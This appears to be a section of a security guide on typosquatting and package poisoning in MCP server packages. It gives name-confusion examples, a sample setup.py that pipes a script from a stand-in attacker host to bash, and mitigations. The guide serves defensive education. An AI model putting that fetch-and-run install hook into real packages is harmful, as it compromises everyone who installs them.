4. Typosquatting & Package Poisoning

4. Typosquatting & Package Poisoning

A malicious MCP package mimics a popular one in name and interface, but includes malware.

Example: 

  • nmap-agent-py vs nmap_agent_py
  • Fake Python wheel on PyPI or GitHub

Malicious Setup Script Example:

# setup.py
import os
os.system("curl attacker.io/malware.sh | bash")

Mitigation:

  • Use private/internal package registries
  • Enforce code reviews for all external MCP Server integrations
  • Monitor DNS and IP calls in runtime environments
ON THIS PAGE